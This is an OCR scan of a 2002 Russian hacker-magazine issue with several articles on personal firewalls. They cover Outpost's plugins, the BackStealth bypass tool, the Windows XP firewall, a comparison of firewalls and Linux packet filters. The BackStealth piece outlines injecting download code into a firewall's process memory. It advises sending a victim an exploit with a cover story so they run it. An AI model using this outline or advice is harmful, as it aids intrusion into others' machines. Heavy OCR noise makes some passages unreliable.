чно полезный, поскольку срезает влет все баннеры и счетчики на 
ицы, оставляя о них лишь воспоминание в виде квадратных скобок с 
ом. Но на слабых машинах он может достаточно сильно притормажи- 
роцесс работы, так как обрабатывается весь пролетающий мимо тра- 
Блокировка идет как по размеру баннера, так и по адресу, откуда его 
вают. Первый всплывший глюк с этим плагином это невозможность 
зайти на RLE :). Очень интересная особенность - это корзина, куда можно 
перетаскивать мышкой пролетающие баннеры, после чего ты их больше не 
увидишь. 

Вторым на очереди стоит «Содержимое», что позволяет блокировать сайты 
с «определенным» содержимым или блокировать содержание сайта. Пер- 
вое действие дает понять, что сайт блокирован, второе действие блокирует 
сайт без особого оповещения. И вовсе не обязательно заносить туда при- 
ятные и радующие глаз порносайты, можно занести туда журнал Бурда, ча- 
ы, в которых любит сидеть твой младший родственник, и другие неприят- 
ные сайты. 

Плуг DNS позволяет обращаться реже к внешнему серверу, а следователь- 
но, немного сократить трафик. Но будь готов к глюкам - если сервер пере- 
ехал на другой адрес, но оставил старое имя, то во время кэширования (по 


Плуг «активное содержимое» позволяет блокировать кусочки кода, кото- 
рые относятся к ActiveX и прочим приблудам, но взамен сильно приторма- 
живает комп, а количество реально существующих активных Х в сети сво- 
дит реальную пользу от плага практически на ноль. Кому действительно 
может пригодиться этот плаг, так это тому, кто никогда не патчит мастдайку 
и пользует исключительно ТЕ и OutLook. При использовании Netscape и Bat 
пользы практически нет. 

«Защита файлов», а именно так называется следующий подопытный, кото- 
рый ковыряется в твоих письмах и выбрасывает оттуда все лишнее. Это 
позволяет скачивать письма с вирусягами без их запуска и с сохранением 
своих нервных клеток. 

И, наконец, самый полезный плаг - «детектор атак», он позволяет опреде- 
лить сканирование твоих портов и засечь безуспешно долбящихся на 138 и 
139 порт ушлых парней. Качество определения сканирования достаточно 
высоко, ошибается в основном только при использовании ЕТР в пассивном 
режиме. При настройке плагина можно установить режимы блокировки, 
что позволит блокировать атакующего или блокировать всю сеть. Эффект 
со стороны такой: начинается сканирование, и через 5-6 отсканированных 
портов компьютер просто исчезает, якобы ты упал. Смешно :). 


ПРИГОВОР 


Аутпост - качественно написанный файрвольчик, который позволяет ис- 
пользовать себя задарма и при этом очень хорошо настраивается. Можно 
ставить как на домашний комп, так и на гейте для маленькой сетки. Главное 
его преимущество - это быстрая и удобная настройка. При испытаниях на 
98 виндах он отлично выдержал удар IGMP, за что получил от меня лично 
плюс в свою сторону. 
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ТапаТ (TanaT@hotmail.ru) 


Предположим, ты хочешь кого-то хакнуть, а у этого чела 
стоит файрволл, что делать? Надо сказать, что сегодня 

эта проблема достигла пика своей актуальности. Суди сам - 
все, кому не лень, обвешались антивирусами и файрволлами. 
Даже полные ламеры знают, что «защита от злобных 
хацкеров достигается с помощью огромного числа security 
utils». Сейчас мы и поговорим об одном принципиальном 
способе обхода файрволла. 


В мае этого года некий программер Паоло Иорио реализовал метод, поз- 
воляющий обходить файрволлы изнутри. Итальянец написал небольшую 
программу, которая, будучи запущенной под файрволлом, может беспре- 
пятственно подключиться к сети и скачивать тестовый файл. Если быть 
точным, то эта мега-прога дурачит не все файрволлы, а лишь: Kerio 
Personal Firewall, McAfee Personal Firewall, Norton Internet Security 2002, 
Sygate Personal Firewall Pro, Tiny Personal 
Firewall (всего-то :) - прим. ред.). 
Вначале разберем, что делает утилитка 
под названием BackStealth. Чтобы она 
заработала, нужно запустить ее на компе 
с установленным файрволлом. Тогда BS 
просканирует машину и попытается оп- 
ределить, установлен ли на ней какой-ли- 
бо из «поддерживаемых» файрволлов. 
Если BS найдет хоть один из них, то попы- 
тается установить соединение с сетью и 
скачать файл по адресу: www.pc- 
facile.com/security/backstealth.txt. Этот 
файл она сохраняет на винте: 
C:\retrieve.dat. Вот его содержимое: 


BACKSTEALTH test 
A collaboration with http://www.pc-facile.com 
Copyright 2002 Paolo Iorio 


If you are reading this message it means BackStealth has managed to 
download this file WITHOUT your firewall being aware of it. No need to say 
that this is not good at all! 


Как видишь, проведение самого теста никакого вреда причинить не MO- 
жет. Благо файл текстовый, а не деструктивно-исполняемый. Теперь да- 
вай посмотрим, как В5’у удается такой трюк. 

Cam автор решил не сильно распространяться о механизме работы своей 
программы и сообщил лишь следующее: «BS использует Win АРТ функцию 
VirtualAlloc, чтобы разместить необходимый для исполнения код в памя- 
ти, которую OC выделила файрволлу. Таким образом, при обращении к се- 
ти и OC, и файрволл думают, что в Интернет лезет сам файрволл!» 
Действительно, если запустить эту прогу под файрволлом (мы пробовали 
это на каждом файрволле из предлагаемого списка), то в списке открытых 
соединений реально будет прописан работающий файрволл. (Список от- 
крытых соединений можно просмотреть командой «netstat -ап» или с 


Mega Info: 

Paolo lorio: http://piorio.supereva. it 
E-mail: piorio@yahoo.com 

BackStealth Security Test 1.1: 
http://piorio.supereva.it/backstealth.zip 


030 november/11/2002 


coud Dew 
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ВАГЕСТЕДЕТН Secure Тен ИС DDS Poo ина 


помощью любой графической утилиты, например, TCPview: www.sysinter- 
nals.com/files/tcpview.zip) 


Кажись, все ясно, прога маскируется под файрволл и пытается выдать се- 
бя за его часть. Но на самом деле автор немножко схитрил. Что будет, ес- 
ли запустить BackStealth под любой последней версией файрволла (было 
бы глупо думать, что разработчики ни- 
как не отреагируют на такую дырку)? 
Очень просто, BS отыщет сторожа и 
попытается в него внедриться; так как 
разработчики уже что-то там поменя- 
ли, у нашего ренегата ничего не полу- 
чится. Появится ошибка: 
VirtualAllocEx failed:120. 

Ну что ж. Запускаем MSDN и смотрим, 
что это за функция и где она живет. 
Видим, данная функция позволяет ра- 
ботать с памятью, уже занятой другим 
процессом. В отличие от VirtualAlloc, 
которая управляет памятью, еще ни- 
кому не выделенной или выделенной 
своему процессу. Создатель «случайно» перепутал функции? 


LPVOID VirtualAllocEx( 

HANDLE hProcess,  // дескриптор процесса; 

LPVOID lpAddress, // начальный адрес выделяемой памяти; 
SIZE_T dwSize, // размер выделяемой памяти; 

DWORD flAllocationType, // вид выделения памяти; 

DWORD flProtect // вид защиты при работе с данной памятью. 


)} 


Обрати внимание на последний формальный параметр функции. Он мо- 
жет принимать несколько значений, позволяющих либо полностью защи- 
тить выделенную память от чтения/записи, либо сделать это частично. 
Видимо, разработчики файрволлов не обратили на flProtect особого вни- 
мания и использовали память, не защищая ее от вторжения. Теперь же по- 
пытка обращения к защищенной памяти приводит к ошибкам или исклю- 
чениям. 

Красным шрифтом мы выделили три фрагмента. В первом фраза «1 can’t 
to open» просто показывает, что автор не дружит с английским :), слово 
«to» там абсолютно излишне. Во втором число 120 является номером 
процесса. Видимо, именно это число и удалось выяснить для каждого 
файрволла. Третий фрагмент как раз и указывает на ошибку при вызове 


Красный цвет символов добавлен для наглядности 


функции VirtualAllocEx с параметром 120 в качестве дескриптора чужого 
процесса... 


Также интересным является тот факт, что функцию VirtualAllocEx не под- 
держивают Win95/98/ME, хотя VirtualAlloc поддерживается всеми OC. 
Теперь становится почти прозрачным алгоритм работы BS: 

1. Сканируем память и ищем запущенные файрволлы. 

2. Внедряемся в их память (благо дома можно с помощью отладчика по- 
добрать все размеры памяти либо адреса дескрипторов или сами дес- 
крипторы файрвольных процессов). 

3. Записываем свой небольшой кусочек кода, скачивающий наш файл. 
Можно либо поместить его в оставшееся свободное место в памяти (ты же 
помнишь, что память выравнивается по параграфам для ускорения обра- 
щения к ней), либо на занятое место процесса так, чтобы OC не зависла. 
Примечательно, что представитель компании Symantec заявил, что их 
пользователям данная программа не страшна, так ее еще на момент запу- 
ска отловит Norton Antivirus. В принципе, это самый верный подход, ведь 
фаерволл не может защитить сам себя от внутреннего вмешательства. Хо- 
тя эту дыру уже залатали (мы проверили работоспособность проги на СА- 
МЫХ последних версиях файрволлов - BS везде проваливается с трес- 
ком), можно найти и новые. А вот антивирус здесь в самый раз. Если соф- 
тина ищет что-то в памяти и начинает прыгать по чужим процессам - зна- 
чит она вирус или, в крайнем случае, просто подлежит уничтожению. 
Другие компании отреагировали проще: втихую поменяли какие-то свои 
параметры и выпустили новые версии своих продуктов. 


BACKSTEALTH 


Обрати внимание, что всеми любимые ZoneAlarm Pro и Agnitum Outpost 
оказались на высоте - у них врожденный иммунитет к этой программе. 
Видимо, у автора просто не дошли руки до них... 

Что касается BS, то тут можно согласиться с Buglraq, который на страни- 
це, посвященной творению Паоло, написал просто: «Дискуссия закрыта». 
Мы же возвращаемся к нашим баранам: чтобы обойти файрволл, нужно 
найти в нем дырку, заслать свою прогу-эксплоит и придумать легенду, 
чтобы ее запустили. Самым сложным моментом является поиск дырок. Не 
все способны кодить в ring 0 или на низком осевом уровне, но посещать 
сетевые проекты, посвященные безопасности, может каждый. Опыт пока- 
зывает, что 75% пользователей и сисадминов не реагируют на новые со- 
общения о дырках и ошибках. Поэтому единственное, что тебе нужно, - 
отыскать дыру среди вновь найденных и правильно ею воспользоваться. 
Вывод прост - чаще посещай www.xakep.ru, а конкретно - его раздел 
BugTraq, и не забывай поглядывать на Www.securityfocus.com (там иногда 
тоже полезное лежит). 


== 
бы 


раде 031 


ВСЕОБЩАЯ 
ЧНТЕГРАЧЦИЯ 


АКА 


Котап ocent (docentmobi le@yandex.ru) 


К примеру, заменитель ICQ - Messenger (которым они обещают затмить 
популярность системы ICQ) или интерфейс для записи дисков, позволяю- 
щий обойтись без внешней программы вроде DirectCD, и даже Web-cepBep 
IIS - это и многое другое, хочешь ты этого или нет, тебе без лишних во- 
просов поставят вместе с Windows ХР. Видимо, скоро достаточно будет по- 
ставить на твою тачку один лишь Windows и больше не придется ставить 
ничего другого (только не это, шеф! - прим. ред.). Про то, сколько все эти 
прелести будут занимать места и сколько сожрут ресурсов, страшно, по- 
жалуй, даже подумать (ты уже сейчас можешь это увидеть, если поста- 
вишь ХР на несильно навороченную тачку). Особенно учитывая тот факт, 
что мелкомягкие изо всех сил стараются свести манипуляции пользовате- 
ля при установке этой оси к критическому минимуму и избавить от такой 
бесполезной, на их взгляд, функции, как возможность выбрать компонен- 
ты для установки. А вот избавиться от некоторых ненужных тебе про- 


грамм по окончанию установки иногда бывает очень трудно, вспомни хо- 
тя бы, как ты выковыривал ТЕ из Windows 98, ведь без него окошки рабо- 
тали куда шустрей, а в качестве браузера можно было использовать Орега 
или Netscape. Я вот только недавно смог избавиться от пресловутого 
Messenger’a - не знаю, как ты, но Асю я ни на что не променяю. То же са- 
мое касается и брандмауэра, встроенного в ХР, о котором, собственно, и 
пойдет речь. 


Итак, в ХР встроен пользовательский файрволл, напоминающий чем-то 
старый добрый ATGuard (который, кстати, никуда не исчезал, а просто вхо- 
дит сейчас в состав Norton Internet Security), но с меньшим набором воз- 
можностей. Конечно, для защиты корпоративного сервера или чего-то бо- 
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лее серьезного, чем домашняя или офисная тач- 
ка или небольшая сеть, он вряд ли подойдет. Но 
для мирных домашних (и офисных) целей впол- 
не покатит, если, конечно, ты не ярый любитель 
сетевых разборок с применением тяжелых во- 
оружений. Ведь основной принцип защиты ос- 
нован на том, что прога не только закрывает 
порты, но и делает твою машину невидимой в се- 
ти; так ее вряд ли удастся обнаружить сетевым 
сканером (впервые эта фича появилась в 
Outpost’e, а теперь ее юзают все, кому не лень - 
прим. ред.). Хотя, как можно предположить, у 
этого есть и свои отрицательные стороны, так 
как некоторые нужные сервисы могут оказаться 
неработоспособными при таких условиях. Пого- 
ворим о том, как лучше и логичней настраивать 
это средство. ХР-шный файрволл можно настро- 
ить индивидуально для каждого соединения, то 
есть, если тебе в домашней сети нужно запре- 
тить доступ к некоторым сервисам, а в Инете ты 
активно их юзаешь, то, соответственно, в наст- 
ройках соединения для домашней сети их мож- 
но отключить, но оставить включенными для со- 
единений с Инетом (кстати, эту функцию под- 
держивают далеко не все пользовательские 
файрволлы). Плохо это или хорошо -решать те- 
бе; с одной стороны - это удобно, с другой - мно- 
го лишнего гимора, так как, возможно, придется 
выполнять двойную работу для каждого из со- 
единений. Кроме того, если твоя тачка является 
сервером и все компьютеры сети соединены с 
Инетом через нее, то можно защитить их и рас- 
пределить их обязанности, настроив правила 
для каждого: вот этот компьютер будет HTTP/FTP 
сервером, а этот почтовым и т.д. 

Настроить файрволл для любого из соединений 
очень просто. Дело в том, что у него нет практи- 
чески никакого интерфейса :). Войди в свойст- 
ва соединения и выбери вкладку «дополнитель- 
но». В этой вкладке поставь флажок «защитить 
мое подключение» и нажми кнопку «парамет- 
ры». Там ты увидишь список различных служб и 
протоколов, для каждого из которых можно за- 
дать свои правила, а также указать сетевое имя 
или ТР машины в сети, на которой данная служ- 
ба работает. В списке уже есть наиболее рас- 
пространенные службы, такие, как HTTP, FTP, 
Telnet и POP3/SMTP. Ho если тебе нужно настро- 
ить правила для чего-то другого, то можно за- 
дать все самому, с этим проблем нет. 

По умолчанию любые службы и сервисы будут 
запрещены, пока ты не пометишь их флажком и 
не выберешь соответствующие параметры. На- 
пример, если на твоей тачке (или на любой дру- 
гой в твоей сети) нужно разрешить работу с 
протоколом НТТР, то помечай ее флажком и 
указывай в ее свойствах сетевое имя или IP 
своей тачки или той, на которой эта служба 
требуется. Во вкладке «ведение журнала безо- 
пасности» можно указать, нужно ли записывать 
логи и куда их сохранять. При этом есть воз- 
можность получить информацию о пропущен- 
ных пакетах и успешных соединениях. 

И еще одна полезная функция - это настройка 
правил для ТСМР пакетов. По умолчанию они то- 
же являются заблокированными, и до твоего 
компьютера при такой настройке не пройдет да- 
же ping-3anpoc (как раз та самая «плохая» не- 
видимость, о которой я уже упоминал). 


Самый большой недостаток и, собственно, при- 
чина, по которой лично я не юзаю это средство 
самообороны, так это то, что ХР-шный файрволл 
позволяет защищать порты лишь для входящих 
соединений. А вот любая программа или сервис 
могут без проблем заюзать любой порт на твоей 
тачке и передавать через него пакеты, не спро- 
сив у тебя разрешения. Это значит, что любой 
засланный троянец может открыть свой порт и 


передать через него любые данные своему хозя- 
ину. То же самое касается и подмены экзешника 
- ему плевать, какой размер или версия у файла. 
Конечно, залетный кулхацкер может быть и не 
получит доступ к открытому трояном порту и не 
сможет тебя админить, но если он не ламер, ни- 
что не помешает ему грамотно настроить свою 
лошадку. И тогда она принесет хозяину все что 
нужно и без его непосредственного вмешатель- 
ства. Не буду упоминать даже банальное отсы- 
лание твоих данных на мыло - от этого вообще 
может спасти только твоя бдительность. Как ва- 
риант - вполне возможно, что троянец просто 
пропишет свой порт как открытый в настройки 
программы, и, пока ты этого не заметишь, злоб- 
ный хаксор сможет юзать этот порт как ему взду- 
мается - но это в принципе можно сделать прак- 
тически с любым файрволлом, если знать, как он 
устроен. 

Еще один момент. Предупреждение о запросе 
на открывание каким-либо сервисом, какого- 
либо порта ты вряд ли получишь, чего не ска- 
жешь о большинстве других файрволлов. Един- 
ственное, что ты можешь сделать с исходящими 
соединениями, это почитать логи и узнать, что, 
куда и через какой порт передавалось («пере- 
давай привет мамочке!»). 

Кроме всего прочего, разработчики не рекомен- 
дуют использовать этот файрволл в локалке без 
выхода в Инет, так как это может нарушить об- 
мен данными между компами в этой сети. Так 
что в локалке, особенно если она у тебя боль- 
шая, этот файрволл особо не сможет тебе по- 
мочь. 

Отсутствие блокировки исходящего трафика, 
невозможность тонкой настройки, отсутствие 
предупреждений и возможные конфликты с се- 
тевыми сервисами - вот основные слабые мо- 
менты этого файрволла. 


Не знаю, как ты, а я по-прежнему буду юзать 
свой Norton Internet Security (aka ATGuard), ко- 
торый тоже не является эталоном безопасности, 
но все же не раз меня спасал от всяческих сете- 
вых атак и бесцеремонных вторжений. А однаж- 
ды он даже обнаружил троянца, которого про- 
пустил даже хваленый AVP - но это уже совсем 
другая история... 
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ПЕРСОНАПЬНЫ 
el a Е Ш 5 LL Sl Скажи мне, у тебя есть Firewall? Что это такое, спросишь 


ты? Ну, тогда тебе в рубрику «РАС» нашего журнала. 
А пока ты ползаешь в факах, я расскажу о самых надежных 
и популярных Firewall ах для всеми нами уважаемой 


и почитаемой Windows. 


утепление окон на зиму, недорого 


Скрыпников Сергей aka Slam (slam@soobcha.org) 


Ты, наверное, догадываешься, что мы живем в ХХ] веке - веке цифровых технологий. И защита 
информации - одна из самых важных задач человечества в целом (будь то защита от самих себя 
или от инопланетян =)). Согласись, не каждый может позволить себе выложить порядка 3000$ за 
защиту своей информации, купив профессиональный аппаратный файрволл. А людей, которым 
просто хочется навредить кому-то, в сети меньше не становится, но когда они наткнутся на твою 
стену, то, скорее всего, пойдут искать тебе другую жертву. Или вообще забьют на хаксорство :). 


Tiny Personal FirewallZoneAlarm ProNeoWatch 


В тести ровании принимают участие: | Outpost FirewallAnti-HackBlackICE DefenderTermiNet 


Sygate Personal Firewall Pro 
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TINY PERSONAL FIREWALL al 
Язык: English as ee 
Качать: http://www. kodsweb.ru/dwn/netsecurity/tinypf2015.exe 
Размер: 1384 Кб 


Freeware a 


Ось: all win32 


Ei 


Очень неплохой файрволл. Имеет три состояния своей работы: дет. | 
1) Сеть полностью недоступна - полезна тем, у кого выделенка (например, 
ты пошел есть пирожки, а к тебе никто не смог проникнуть, т.е. полностью 


уверен в том, что придешь туда, откуда ушел =)). a ace 

2) Файрволл будет тебя спрашивать при каждом подключении к порту: раз- 

решить или нет. Но если ты сидишь, допустим, в ТСО, то у тебя сдадут нер- Е эры 

вы, для этого придумана галочка «Don't ask me again», ставишь галку и раз- = ЕЕ 
решаешь или запрещаешь действие - и все. Больше подобных вопросов не = 

будет. 


3) Все, что не запрещено - разрешено ;). Так вот можно сказать о третьем 


режиме работы данной проги. За] 
Если ты хочешь добиться абсолютного максимума безопасности для своей 
машины с помощью этой программы, то тебе придется немного повозиться 
в настройках, которые в основном касаются того, чтобы запретить весь ди- ыы | 
апазон IP адресов или только один адрес, запретить выход для данной про- a) a |_| 
ги только на один порт или на все. В общем, ничего трудного я не увидел. _ 
Все попытки трояна на выход в сеть Tiny сразу же пресекал и оставил са- о И 
мые хорошие впечатления. ны 
SS рае ны Sa: нее ео ее 
Итог: Для обычного домашнего пользования очень и очень неплох. В наст- EE „ ГЕ 
ройках разберется даже младенец. К полезностям можно добавить то, что — 
при работе под NT может писать все в syslog =). Сисадмины в восторге! Les ie ery ie: er 
ee 
ZONEALARM PRO ae и se 


Le an Ви ee пе = 


Язык: English 

Качать: http://www.kodsweb.ru/dwn/netsecurity/zapro26362.exe 
Размер: 3215 Кб 

Shareware 

Ось: all win32 


Знакомьтесь 
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Это файрволл понравится тем, кто любит, чтобы все хорошее было краси- 
вым. Надеюсь, ты и сам можешь увидеть это на скриншоте выше. 

Из обычных файрвольных функций присутствуют почти все. При инсталля- 
ции программа спросит тебя, хочешь ли ты сразу разрешить своему браузе- 
ру выходить в Интернет; советую ответить «Yes», т.к. в дальнейшем все рав- 
но придется создавать для него правило. При попытке программы соеди- 
ниться с Интернет, ZoneAlarm тут же оповестит тебя об этом и предложит 
тебе два варианта: разрешить исходящий трафик или блокировать. Также 
существует галочка «Remember this answer the next time I use this program» 
(напомни мне этот вопрос в следующий раз, когда я буду использовать эту 
программу), которая по дефолту не нажата, что очень удобно. 


Можно выставить режим автоматической блокировки всего входящего\ис- 
ходящего трафика, например, когда нету интернет-активности в течение 10 
мин или когда включается Screen Saver. Файрволл удачно прячет последний 
сегмент твоего IP адреса, блокирует все не ТР-пакеты (что полезно при 
ДОС-атаке на тебя - прим. ред.), ведет логфайл, проверяет себя на обнов- 
ление и делает еще кучу всякого полезного (ловит, например, вирей во вхо- 
дящем мыле). 

Как и предыдущий конкурент, 7А сразу засек трояна и не дал ему пробить- 
ся в Интернет. 

Ах да, забыл добавить, что при стандартной замене iexplore.exe на 
telnet.exe firewall вежливо сказал мне, что файл изменился с момента по- 
следнего его запуска. Приятно. 

Итог: получился хороший, добротно сделанный файрволл, который можно 
использовать уже не только для домашних и личных целей, но и в офисе, 
для защиты корпоративной сетки. 


ПЕРСОНАЛЬНЫЕ FIREWALL’bI ДЛЯ WIN 
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Язык: English 

Качать: http://www. kodsweb.ru/dwn/netsecurity/neowatch23.exe 
Размер: 1566 Кб 

Shareware 

Ось: all win32 


Чтобы не мотать тебе нервы одним и тем же, скажу, что NeoWatch умеет де- 
лать все, что может понадобиться дома. Про ведение лога, настройку безо- 
пасности и т.п. я говорить не буду. 

Из полезного отмечу, что при помощи функции Trace Firewall может пока- 
зать тебе на карте то место, откуда тебя только что пинганули. Только сна- 
чала тебе нужно указать свое место жительства, но если ты живешь в Коз- 
лопердуйске, то лучше укажи самый близкий к тебе большой город, тогда ты 
сможешь увидеть все в нормальном цвете =). 

Если ты не знаешь что такое Ping или Flood, то при помощи пимпы «More infor- 
mation» в логе ты сможешь про все это подробно почитать в системе помощи. 
Но плохо то, что помощь эта вся в Интернете и обязательно нужно быть в он- 
лайне ;(, и если у тебя проблемы с английским, то лучше ею не пользоваться. 
Если тебя кто-то пытается просто пропинговать, то файрволл тут же сооб- 
щит тебе об этом на бросающемся в глаза попапе, где будет информация об 
обидчике, включая его ТР адрес. 
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Ты сразу же можешь занести его в Banned List. Также файрволл выдаст Te- 
бе всю информацию о том, кто и что у тебя сканирует. 

Например, если кто-то сканирует тебе 5000 порт, то NW тут же выдаст те- 
бе окно со всей инфой, включая то, где обычно используется данный 
порт и чем это опасно. 

Итог: Красивый, удобный в настройке, понятный даже новичку файрволл. С 
большим количеством действительно полезных функций, и если добавить 
сюда еще ведение лога с возможностью фильтрации и печати отчета, то по- 
лучается очень полезная в хозяйстве вещь! 


OUTPOST FIREWALL 


Язык: русский, HO можно и другой 

Качать: http://www.agnitum.com/download/OutpostProInstall.exe 

Размер: 2577 Кб 

Shareware (но есть и Freeware) 

Ось: all win32 

Начну с того, что OF признан лучшим файрволлом года! Это уже о многом 
тебе должно сказать. В природе существует как полнофункциональная 
платная версия (о ней я тебе и расскажу), так и полностью Freeware. Пер- 
вое, что бросается в глаза - это полностью русифицированный интерфейс, 
так что с настройками у тебя проблем возникнуть не должно. 

Этот файрволл имеет функции всех вышеперечисленных, но... Просто так 
файрволлом года не станешь, у него есть туча приятных фич внутри :). Из 
особых полезностей хочу выделить блокировку Куков и АктивХ элементов, 
так что теперь можно быть немного спокойнее за сохранность своей ано- 
нимности в то время, когда ты бродишь по сети. 

Встроенная резалка рекламы. «А, такое мы уже видели», - скажешь ты. Но 
не тут-то было, т.к. Аутпост режет рекламу разными способами, как то: не 
загружает картинки заданных размеров (например, популярные баннеры 
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Первый шагом по настройке файрволла будет 
получение ясного представления для тебя, чего 
именно ты ожидаешь от его работы. В будущем 
это даст возможность сравнить результаты тес- 
тирования и имевшиеся до этого ожидания и 
таким образом оценить величину имевшейся 
ошибки. 


Убедись в безопасности файрволла в плане фи- 
зического доступа к нему посторонних лиц. Ес- 
ли с этим проблемы, то весь остальной труд на- 
прасен. 


Следующее, используемая ОС сама по себе 
должна быть достаточно грамотно настроена в 
плане безопасности. Но т.к. мы рассматриваем 
виндовые файрволлы, то лучшим выбором бу- 
дет, на мой взгляд, Windows NT/2K. 


Следующий шаг - сканирование портов файр- 
волла как со стороны внутренней сети, так и со 
стороны Internet (icmp, udp, tcp) для определе- 
ния открытых портов. Большинство правильно 
сконфигурированных файрволлов не имеет от- 
крытых портов. Более того, они игнорируют 
|СМР-пакеты, приходящие из внешней сети. 
Работать должно всего несколько служб. Без 
крайней необходимости порты не должны от- 
крываться. 


Необходимо руководствоваться правилом: за- 
прещено все, что не разрешено, а не правилом - 
разрешено все, что не запрещено. Поэтому база 
правил должна начинаться с правила, запреща- 
ющего любой трафик (Режим полной блокиров- 
ки), входящий и исходящий. Остальные правила 
должны идти за этим основным. После проверки 
базы правил firewall’a проверь его логи. Опре- 
делил ли firewall проводившееся сканирование 
и давал ли он соответствующие сигналы (alerts). 
Какой трафик и каким образом был записан в 
логи. Если файрволл не зафиксировал боль- 
шую часть активности во время тестирования 
его настроек, это свидетельствует о наличии се- 
рьезных проблем. Степень безопасности, кото- 
рую дает применение файрволла, прямо про- 
порциональна тщательности, с которой он был 
настроен. 


100*100 ит.п., в поставке проги уже есть стандартный набор правил для 
обрезания =)), но ты можешь как удалять, так и добавлять свои. Еще мож- 
но заблокировать графику\рекламу по ключевым строкам в коде HTML, в 
итоге все эти действия существенно повысят скорость загрузки страни- 
чек, притом что ничего полезного ты пропустить не должен (а кто-то нам 
говорил про ускорялки Интернета...). 

Еще одна замечательная фича пригодится в большинстве своем родителям 
или системным администраторам. Она позволяет блокировать загрузку 
страниц как по ключевым словам, так и по названию самого сайта. «Теперь 
ваши детки не будут лазить по вкусным сайтам!» - так можно обозвать эту 
возможность OF. Самой же главной отличительной чертой этого файрвол- 
ла от других является открытость архитектуры, за счет чего можно созда- 
вать различные плагины («подключаемые модули» в жаргоне программы). 
В стандартный набор входят уже шесть плагинов, которых должно хватить 
на все случаи жизни: Детектор атак, Защита файлов, Блокировка рекламы, 
Блокировка содержимого страниц, Кеширование DNS (для еще более быс- 
трой загрузки страниц) и Блокировка активного содержимого, куда входят 
блокировка куков, АктивХ компонентов, всплывающих окон ит.п. 


Все действия, производимые файрволлом, тут же записываются в логи вы- 
водятся на экран, так что ты можешь без напрягов наблюдать за ней. 


И что еще замечательно, так это то, что для каждого сетевого приложения 
можно настроить свои правила работы в Интернете: к примеру, если ты поль- 
зуешься несколькими браузерами, то данная фенька тебе очень пригодится. 


При тестировании файрволл с легкостью заметил, что троян хочет проник- 
нуть в Интернет и что мою машину кто-то усиленно сканирует. И начал зло- 
стно орать, когда я попытался заменить файл iexplore.exe на telnet.exe. 
Итог: Must Have однозначно! Мой выбор! 


СОСКРЕБЕМ НАКИПЬ 


Это, так сказать, лидеры в желтых майках. Я хочу сказать тебе, что больше 
в Интернете я на данный момент не нашел достойных к рассмотрению 
файрволлов! Я не стал придерживаться такой тактики, как «Что найдешь, то 
и опиши», т.к. в последнее время обзоры стали немного скучнее - пара- 
тройка программ супер, а остальные описаны как фуфлыжные. Так зачем их 
описывать, если все равно пользоваться ими никто не будет!? Такие проги, 
как AtGurad, ConSeal PC Firewall, я рассматривать не стал по причине того, 
что уже староваты они - сами на ногах не держатся. 

Остальные тестируемые мною Ате\Маы не справились с большинством из 
поставленных задач, а они были, если ты забыл: 


ПЕРСОНАЛЬНЫЕ FIREWALL’bI ДЛЯ WIN 


1) замена файла iexplore.exe на telnet.exe; 

2) попытка трояна (042) вырваться в Интернет; 
3) сканирование портов на моей машине; 

4) сокрытие от посторонних глаз IP адреса. 


Итак, лажанувшиеся: 


МЕТ SENTINEL 


Очень странная прога. При попытке трояна вылезти наружу она никаких 
предупреждений не выводила (записи в лог не было), но трафик блокиро- 
вала; при попытке просканировать мои порты опять же никаких Alert’oB не 
выводила, но делала систему недосягаемой. Если кому-то интересно узнать, 
что это такое, то качать здесь: 

http://www. kodsweb.ru/dwn/netsecurity/netsentinel204.zip (2014 Кб). 


В мой совсем черный список попали: 

Anti-Hack (некоторые порты оставались открытыми) 

BlackICE Defender (сокрытие ТР не работало) 

TermiNet (сокрытие IP не работало + открыты некоторые порты) 
Sygate Personal Firewall Pro (сокрытие IP не работало) 


Ах, да. Я ничего He сказал про легендарный Jammer. Файрволл заслужива- 
ет места на твоем компьютере, но учти, что на данный момент почти все ан- 
тивирусы воспринимают его как вирус =). Так что не пугайся, если что! 
Качать тут: http://online.download.ru/Download/[ProgramID=1296] 

(1095 Кб). 


Запомни, что ненастроенный файрволл - огромная дыра в твоей машине! И еще, 
сверху я привел список параметров для тестирования файрволлов, так вот - это 
САМЫЙ минимум, который должен выполнять твой персональный файрволл! 


На этом все. Надеюсь, что скоро твоя система станет неприступной кре- 
постью! 


== 
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ЧТО К ЧЕМУ 


Ты уже в курсе, что, для того чтобы ты смог защитить свою раздолбанную 
систему или сеть от нашествия всяких гнусных парней, нужно поставить 
firewall. Файрволлы бывают разных типов, в том числе и такого весьма за- 
бавного, как пакетные фильтры. У тебя есть возможность прочесть про 
НИХ, HO... Там не рассказано о некоторых заморочках, с которыми тебе 
придется столкнуться. Перед применением пакетного фильтра тебе при- 
дется повозиться с самым сердцем твоей операционной системы - с яд- 
ром. 

Я тебе не буду рассказывать про такую шнягу, как Windows. Это все пош- 
ло и неинтересно. Да, там можно быстро поставить программку фильтра 
трафика, только вот никто тебе не даст никакой гарантии, что она сама 
окажется без дырок. И никто тебе не даст гарантии, что эта фигня будет 
работать именно так, как задумал ты сам. 

В операционной системы Linux все совсем по-другому. Подобно многим 
настоящим nix’am, внутри Linux содержится система защиты. Тебе остает- 
ся только активировать ее, настроить и задать правила фильтрации. После 
всех этих извращений ни одна сволочь к тебе не прорвется. 


ПРОГУЛКА ПО ЯДРАМ 


Как и любая нормальная система, Linux развивалась от версии к версии. 
Если быть откровенным, то самые первые версии OC были очень слабы и 
неразвиты и представляли собой лишь полигон, на котором талантливые 
кодеры проводили свои эксперименты. Лишь с версии 2.0 Linux полно- 
ценно пошел в массы. 

Номер версии ядра состоит из трех чисел в виде х.у.2 (главный номер 
версии, вторичный номер версии, номер релиза). Главный номер, по сути, 
является номером поколения ядра. Вторичный номер (номер ветки) озна- 
чает смену технологии внутри поколения, ну а номер релиза говорит об 
очередном шаге в улучшении и развитии ядра данного поколения. Чем 
выше номер релиза, тем лучше ядро данной ветки. 

В литературе и в Сети говорят о ветках 2.0.х, 2.2.х и 2.4.х. Ты, наверное, 
заметил, что вторичный номеру них четный. Дело в том, что ядра с нечет- 
ными вторичными номерами являются экспериментальными и очень час- 
то неработоспособны - они предназначены только для разработчиков 
ядер или для экстремалов. 

Про ядра 2.0.х я говорить не буду. Компьютеры под управлениям этих яд- 
рышек практически не встречаются и интереса не представляют. В насто- 
ящее время на серверах крутятся ядра веток 2.2.x и 2.4.x. Пакетные 
фильтры, встроенные в них, очень похожи (впрочем, ничего удивительно- 
го - iptables, встроенный в 2.4.х, является потомком ipchains из 2.2.x). 


НАЧИНАЕМ КОВЫРЯНИЕ В МОЗГАХ 


